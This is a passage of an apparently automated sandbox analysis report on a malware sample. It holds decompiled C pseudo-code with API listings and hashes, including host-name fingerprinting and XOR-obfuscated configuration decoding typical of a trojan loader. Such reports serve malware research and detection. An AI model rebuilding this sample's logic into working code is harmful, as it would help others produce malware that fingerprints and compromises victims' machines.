                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp Download File
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp Download File
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3298025750-8415677
                                                                                                                                  • Opcode ID: 372af91ea904c5e2283a96fc2353fc8bbacadd15bac65d642dcc13e51ff4bf15
                                                                                                                                  • Instruction ID: a98f59185553579d062f5a1870be578e4090aad78f650fff3d352a84287deef7
                                                                                                                                  • Opcode Fuzzy Hash: 372af91ea904c5e2283a96fc2353fc8bbacadd15bac65d642dcc13e51ff4bf15
                                                                                                                                  • Instruction Fuzzy Hash: CBB012B5100A00ABCE256B50EF04F05BA31B79C702F014012B30440078C7314460FB35
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                  			E031A144D(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* __esi;
                                                                                                                                  				intOrPtr* _t35;
                                                                                                                                  				void* _t40;
                                                                                                                                  				intOrPtr* _t41;
                                                                                                                                  				intOrPtr* _t43;
                                                                                                                                  				intOrPtr* _t45;
                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                  				intOrPtr* _t52;
                                                                                                                                  				void* _t54;
                                                                                                                                  				intOrPtr* _t55;
                                                                                                                                  				intOrPtr* _t57;
                                                                                                                                  				intOrPtr* _t61;
                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t75;
                                                                                                                                  				void* _t76;
                                                                                                                                  
                                                                                                                                  				_t55 = _a4;
                                                                                                                                  				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                  				_a4 = 0;
                                                                                                                                  				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                  				if(_t76 < 0) {
                                                                                                                                  					L18:
                                                                                                                                  					return _t76;
                                                                                                                                  				}
                                                                                                                                  				_t40 = E031A3DA0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                  				_t76 = _t40;
                                                                                                                                  				if(_t76 >= 0) {
                                                                                                                                  					_t61 = _a28;
                                                                                                                                  					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                  						_t52 = _v8;
                                                                                                                                  						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                  					}
                                                                                                                                  					if(_t76 >= 0) {
                                                                                                                                  						_t43 =  *_t55;
                                                                                                                                  						_t68 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  						_t20 = _t68 + 0x31ae1fc; // 0x740053
                                                                                                                                  						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                  						if(_t76 >= 0) {
                                                                                                                                  							_t76 = E031A47EB(_a4);
                                                                                                                                  							if(_t76 >= 0) {
                                                                                                                                  								_t65 = _a28;
                                                                                                                                  								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                  									_t50 = _a4;
                                                                                                                                  									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_t45 = _a4;
                                                                                                                                  						if(_t45 != 0) {
                                                                                                                                  							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                  						}
                                                                                                                                  						_t57 = __imp__#6;
                                                                                                                                  						if(_a20 != 0) {
                                                                                                                                  							 *_t57(_a20);
                                                                                                                                  						}
                                                                                                                                  						if(_a12 != 0) {
                                                                                                                                  							 *_t57(_a12);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t41 = _v8;
                                                                                                                                  				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                  				goto L18;
                                                                                                                                  			}


                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A3DA0: SysAllocString.OLEAUT32(80000002), ref: 031A3DFD
                                                                                                                                    • Part of subcall function 031A3DA0: SysFreeString.OLEAUT32(00000000), ref: 031A3E63
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 031A152C
                                                                                                                                  • SysFreeString.OLEAUT32(031A28D9), ref: 031A1536
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 986138563-0
                                                                                                                                  • Opcode ID: c24b31b91c3c179eae540687b4832b7f2e7927128851d5315e7456151515962f
                                                                                                                                  • Instruction ID: edf11cda0c551d10630188893f4c8d3f5df222f896e8aac3ff64e01afd8bd60c
                                                                                                                                  • Opcode Fuzzy Hash: c24b31b91c3c179eae540687b4832b7f2e7927128851d5315e7456151515962f
                                                                                                                                  • Instruction Fuzzy Hash: ED311A7A900619BFCB15DF69C888C9BBB79FBCE741B144668F8069B210D731DD51CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A4B28(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                                                  				void* _t21;
                                                                                                                                  				void* _t22;
                                                                                                                                  				signed int _t24;
                                                                                                                                  				intOrPtr* _t26;
                                                                                                                                  				void* _t27;
                                                                                                                                  
                                                                                                                                  				_t26 = __edi;
                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                  					L2:
                                                                                                                                  					_t27 = E031A63F5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                                                                                                  					if(_t27 == 0) {
                                                                                                                                  						_t24 = _a12 >> 1;
                                                                                                                                  						if(_t24 == 0) {
                                                                                                                                  							_t27 = 2;
                                                                                                                                  							HeapFree( *0x31ad270, 0, _a4);
                                                                                                                                  						} else {
                                                                                                                                  							_t21 = _a4;
                                                                                                                                  							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                                                                                                                  							 *_t26 = _t21;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L6:
                                                                                                                                  					return _t27;
                                                                                                                                  				}
                                                                                                                                  				_t22 = E031A1E47(_a4, _a8, _a12, __edi); // executed
                                                                                                                                  				_t27 = _t22;
                                                                                                                                  				if(_t27 == 0) {
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  				goto L2;
                                                                                                                                  			}

                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A1E47: SysFreeString.OLEAUT32(00000000), ref: 031A1EAA
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,031A506B,?,004F0053,05BD9370,00000000,?), ref: 031A4B8B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$HeapString
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3806048269-8415677
                                                                                                                                  • Opcode ID: 0487737e5c0d1e286c947f7db6571b7a1455ac271365d23e56dc5d2b7b2f8e91
                                                                                                                                  • Instruction ID: fa328db68554849977bdacac74a0766bf892f8fa6890f41f39bef76341291f76
                                                                                                                                  • Opcode Fuzzy Hash: 0487737e5c0d1e286c947f7db6571b7a1455ac271365d23e56dc5d2b7b2f8e91
                                                                                                                                  • Instruction Fuzzy Hash: FD01443A100A19BBDF22DF59CC01FDA7BA5EF0C791F098025FE049A221DB71C560D790
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E031A1BBF(void* __ecx) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				void* _t15;
                                                                                                                                  				void* _t19;
                                                                                                                                  				void* _t20;
                                                                                                                                  				void* _t22;
                                                                                                                                  				intOrPtr* _t23;
                                                                                                                                  
                                                                                                                                  				_t23 = __imp__;
                                                                                                                                  				_t20 = 0;
                                                                                                                                  				_v8 = _v8 & 0;
                                                                                                                                  				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                  				_t10 = _v8;
                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                  					_t20 = E031A75F6(_t10 + 1);
                                                                                                                                  					if(_t20 != 0) {
                                                                                                                                  						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                  						if(_t15 != 0) {
                                                                                                                                  							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							E031A4AAB(_t20);
                                                                                                                                  							_t20 = 0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t20;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • GetComputerNameExA.KERNEL32(00000003,00000000,031A4531,74E5F710,00000000,?,?,031A4531), ref: 031A1BD7
                                                                                                                                    • Part of subcall function 031A75F6: RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  • GetComputerNameExA.KERNEL32(00000003,00000000,031A4531,031A4532,?,?,031A4531), ref: 031A1BF4
                                                                                                                                    • Part of subcall function 031A4AAB: RtlFreeHeap.NTDLL(00000000,00000000,031A5012,00000000,?,?,00000000), ref: 031A4AB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ComputerHeapName$AllocateFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 187446995-0
                                                                                                                                  • Opcode ID: 0f188f04b82a45c3ed765eb8e8d2cdf79b5f0c23f974c9e5f85616b3040820e3
                                                                                                                                  • Instruction ID: 46b6dd307226e9ea74be7234cbe9ae2b28706aafd086396f26de714db35f9adb
                                                                                                                                  • Opcode Fuzzy Hash: 0f188f04b82a45c3ed765eb8e8d2cdf79b5f0c23f974c9e5f85616b3040820e3
                                                                                                                                  • Instruction Fuzzy Hash: 89F0542E600605BBEB11D69E8E01FAF77BCDBC9662F150069E905D7149EB70DA019670
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				intOrPtr _t4;
                                                                                                                                  				void* _t10;
                                                                                                                                  				void* _t11;
                                                                                                                                  				void* _t12;
                                                                                                                                  				void* _t14;
                                                                                                                                  
                                                                                                                                  				_t14 = 1;
                                                                                                                                  				_t4 = _a8;
                                                                                                                                  				if(_t4 == 0) {
                                                                                                                                  					if(InterlockedDecrement(0x31ad274) == 0) {
                                                                                                                                  						E031A4450();
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					if(_t4 == 1 && InterlockedIncrement(0x31ad274) == 1) {
                                                                                                                                  						_t10 = E031A262F(_t11, _t12, _a4); // executed
                                                                                                                                  						if(_t10 != 0) {
                                                                                                                                  							_t14 = 0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t14;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • InterlockedIncrement.KERNEL32(031AD274), ref: 031A18ED
                                                                                                                                    • Part of subcall function 031A262F: HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,031A1900,?), ref: 031A2642
                                                                                                                                  • InterlockedDecrement.KERNEL32(031AD274), ref: 031A190D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3834848776-0
                                                                                                                                  • Opcode ID: 9c1d19a4a5ed1aabe8a492dc0377b819f0f808b7cc172808d2f487ad76af6d3e
                                                                                                                                  • Instruction ID: 4ef0a333319193b0d258a336eef08304142b4d336cc5548e4a4de84184a1abfe
                                                                                                                                  • Opcode Fuzzy Hash: 9c1d19a4a5ed1aabe8a492dc0377b819f0f808b7cc172808d2f487ad76af6d3e
                                                                                                                                  • Instruction Fuzzy Hash: D0E09A2D248F227BCA61EA6C980471BAA04AB0C6C3F0A4538A486C102AC720C8C2C2E2
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                  			E031A1E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				void* _v18;
                                                                                                                                  				char _v20;
                                                                                                                                  				intOrPtr _t15;
                                                                                                                                  				void* _t17;
                                                                                                                                  				intOrPtr _t19;
                                                                                                                                  				void* _t23;
                                                                                                                                  
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosw");
                                                                                                                                  				_t15 =  *0x31ad2e0; // 0x2a2a5a8
                                                                                                                                  				_t4 = _t15 + 0x31ae39c; // 0x5bd8944
                                                                                                                                  				_t20 = _t4;
                                                                                                                                  				_t6 = _t15 + 0x31ae124; // 0x650047
                                                                                                                                  				_t17 = E031A144D(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                  				if(_t17 < 0) {
                                                                                                                                  					_t23 = _t17;
                                                                                                                                  				} else {
                                                                                                                                  					_t23 = 8;
                                                                                                                                  					if(_v20 != _t23) {
                                                                                                                                  						_t23 = 1;
                                                                                                                                  					} else {
                                                                                                                                  						_t19 = E031A25D6(_t20, _v12);
                                                                                                                                  						if(_t19 != 0) {
                                                                                                                                  							 *_a16 = _t19;
                                                                                                                                  							_t23 = 0;
                                                                                                                                  						}
                                                                                                                                  						__imp__#6(_v12);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t23;
                                                                                                                                  			}











                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 031A144D: SysFreeString.OLEAUT32(?), ref: 031A152C
                                                                                                                                    • Part of subcall function 031A25D6: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,031A474F,004F0053,00000000,?), ref: 031A25DF
                                                                                                                                    • Part of subcall function 031A25D6: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,031A474F,004F0053,00000000,?), ref: 031A2609
                                                                                                                                    • Part of subcall function 031A25D6: memset.NTDLL ref: 031A261D
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 031A1EAA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 397948122-0
                                                                                                                                  • Opcode ID: 5d85312217f9a36cf57d1459b8f155460aa1b069339e06aee3f1ab8b205abde6
                                                                                                                                  • Instruction ID: 030375cf77b59c356475a66364be1d78b43ebac6912a97ace846bd8c696ec128
                                                                                                                                  • Opcode Fuzzy Hash: 5d85312217f9a36cf57d1459b8f155460aa1b069339e06aee3f1ab8b205abde6
                                                                                                                                  • Instruction Fuzzy Hash: 5701717A904919BFDB12DFA8DC00DABBBB9FF0C251F018535E901E7160D770A962C7A1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,6E97A0D4,00000000), ref: 6E9314AF
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 6fe1b53e5a61c75173237ffe55e9b83f85159e5349f253636f2765e3959dd77f
                                                                                                                                  • Instruction ID: 33ade8be65f4f0e96915dc9de31944de636d38c0d5e1cf206d72fab4f015bedb
                                                                                                                                  • Opcode Fuzzy Hash: 6fe1b53e5a61c75173237ffe55e9b83f85159e5349f253636f2765e3959dd77f
                                                                                                                                  • Instruction Fuzzy Hash: 2CF0E03160493557EB515AF7881CF9B37AD9F83770B31C5219C54D63A4DB30D8058DE1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • RtlEncodePointer.NTDLL(?), ref: 6E8F5C69
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.683899192.000000006E8E0000.00000020.00020000.sdmp, Offset: 6E8E0000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EncodePointer
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2118026453-0
                                                                                                                                  • Opcode ID: 4efdce0500cd4b2bf7b40e7b0934c8eff45945b34de0850ae5108fbd4135702c
                                                                                                                                  • Instruction ID: ea0b29dbe5e6a269ff91347ced616a4077e37ffaf3acb5e122e88cc3d2e5b3f4
                                                                                                                                  • Opcode Fuzzy Hash: 4efdce0500cd4b2bf7b40e7b0934c8eff45945b34de0850ae5108fbd4135702c
                                                                                                                                  • Instruction Fuzzy Hash: 21D0C9B000CF14DFDF05AF54E8147A43BB8FF07306F000428E40D93698D7B59468CA48
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031AAB16() {
                                                                                                                                  
                                                                                                                                  				E031AABF6(0x31ac344, 0x31ad124); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}



                                                                                                                                  0x031aab28
                                                                                                                                  0x031aab2f

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 031AAB28
                                                                                                                                    • Part of subcall function 031AABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 031AAC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: bdca68246cef6413b20526dbc7c5b0bf7e5c6e15bd6d12b15eaf1d457b3e28a7
                                                                                                                                  • Instruction ID: 8dc2744ee8a2723f9208da5b03bcf51148234bebe15f7163415b2dad1cd6b918
                                                                                                                                  • Opcode Fuzzy Hash: bdca68246cef6413b20526dbc7c5b0bf7e5c6e15bd6d12b15eaf1d457b3e28a7
                                                                                                                                  • Instruction Fuzzy Hash: 4DB092AD268D01BF6008D10C2A22C3E418DC88CA13320802AB801D8001EB629C854031
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031AAB31() {
                                                                                                                                  
                                                                                                                                  				E031AABF6(0x31ac344, 0x31ad134); // executed
                                                                                                                                  				goto __eax;
                                                                                                                                  			}



                                                                                                                                  0x031aab28
                                                                                                                                  0x031aab2f

                                                                                                                                  APIs
                                                                                                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 031AAB28
                                                                                                                                    • Part of subcall function 031AABF6: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 031AAC6F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExceptionHelper2@8LoadRaise___delay
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 123106877-0
                                                                                                                                  • Opcode ID: 7ac22d48c66a687d579f142fad4b9f3c579b7433f7138ac72300c841cb16f62b
                                                                                                                                  • Instruction ID: e1e2444d398734f7489b55ad01a3fead99e50471de6df738387feba88c75e0b1
                                                                                                                                  • Opcode Fuzzy Hash: 7ac22d48c66a687d579f142fad4b9f3c579b7433f7138ac72300c841cb16f62b
                                                                                                                                  • Instruction Fuzzy Hash: BBB0928D26AD01AF6088D10C2A22C3A418EC88CA13320801AA801C8101EF514C854131
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E031A75F6(long _a4) {
                                                                                                                                  				void* _t2;
                                                                                                                                  
                                                                                                                                  				_t2 = RtlAllocateHeap( *0x31ad270, 0, _a4); // executed
                                                                                                                                  				return _t2;
                                                                                                                                  			}




                                                                                                                                  0x031a7602
                                                                                                                                  0x031a7608

                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,031A4F70), ref: 031A7602
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000006.00000002.679476534.00000000031A1000.00000020.00020000.sdmp, Offset: 031A0000, based on PE: true
                                                                                                                                  • Associated: 00000006.00000002.679386705.00000000031A0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679603078.00000000031AC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679651403.00000000031AD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000006.00000002.679884130.00000000031AF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 050252c661a5afe405dcf0856c033f335e7f6ba7b10784b0bae4a982a194c370
                                                                                                                                  • Instruction ID: acdcc113f957ab57f01df3d4bdeb2ca3bd6c380d60c85994df39b72b5c6eb168
                                                                                                                                  • Opcode Fuzzy Hash: 050252c661a5afe405dcf0856c033f335e7f6ba7b10784b0bae4a982a194c370
                                                                                                                                  • Instruction Fuzzy Hash: 40B01275000900ABCE156B10EF08F067B71B75C702F024012B20480468C33144A4FB24
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Non-executed Functions

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E031A4C40(int* __ecx) {
                                                                                                                                  				int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				void* __esi;
                                                                                                                                  				signed int _t28;
                                                                                                                                  				signed int _t33;
                                                                                                                                  				signed int _t39;
                                                                                                                                  				char* _t45;
                                                                                                                                  				char* _t46;
                                                                                                                                  				char* _t47;
                                                                                                                                  				char* _t48;
                                                                                                                                  				char* _t49;
                                                                                                                                  				char* _t50;
                                                                                                                                  				void* _t51;
                                                                                                                                  				void* _t52;
                                                                                                                                  				void* _t53;
                                                                                                                                  				intOrPtr _t54;
                                                                                                                                  				void* _t56;
                                                                                                                                  				intOrPtr _t57;
                                                                                                                                  				intOrPtr _t58;
                                                                                                                                  				signed int _t61;
                                                                                                                                  				intOrPtr _t64;
                                                                                                                                  				signed int _t65;
                                                                                                                                  				signed int _t70;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t73;
                                                                                                                                  				signed int _t75;
                                                                                                                                  				signed int _t78;
                                                                                                                                  				signed int _t82;
                                                                                                                                  				signed int _t86;
                                                                                                                                  				signed int _t90;
                                                                                                                                  				signed int _t94;
                                                                                                                                  				signed int _t98;
                                                                                                                                  				void* _t103;
                                                                                                                                  				intOrPtr _t121;
                                                                                                                                  
                                                                                                                                  				_t104 = __ecx;
                                                                                                                                  				_t28 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  				if(E031A5657( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
                                                                                                                                  					 *0x31ad310 = _v8;
                                                                                                                                  				}
                                                                                                                                  				_t33 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  				if(E031A5657( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
                                                                                                                                  					_v12 = 2;
                                                                                                                                  					L69:
                                                                                                                                  					return _v12;
                                                                                                                                  				}
                                                                                                                                  				_t39 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  				if(E031A5657( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
                                                                                                                                  					L67:
                                                                                                                                  					HeapFree( *0x31ad270, 0, _v16);
                                                                                                                                  					goto L69;
                                                                                                                                  				} else {
                                                                                                                                  					_t103 = _v12;
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t45 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t98 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  						_t45 = E031A3BB8(_t104, _t103, _t98 ^ 0x7895433b);
                                                                                                                                  					}
                                                                                                                                  					if(_t45 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                                                                                                  							 *0x31ad278 = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t46 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t94 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  						_t46 = E031A3BB8(_t104, _t103, _t94 ^ 0x219b08c7);
                                                                                                                                  					}
                                                                                                                                  					if(_t46 != 0) {
                                                                                                                                  						_t104 =  &_v8;
                                                                                                                                  						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                                                                                                  							 *0x31ad27c = _v8;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					if(_t103 == 0) {
                                                                                                                                  						_t47 = 0;
                                                                                                                                  					} else {
                                                                                                                                  						_t90 =  *0x31ad2dc; // 0x69b25f44
                                                                                                                                  						_t47 = E031A3BB8(_t104, _t103, _t90 ^ 0x31fc0661);
                                                                                                                                  					}
                                                                                                                                  					if(_t47 != 0) {
                                                                                                                                  						_t104 =  &_v8;
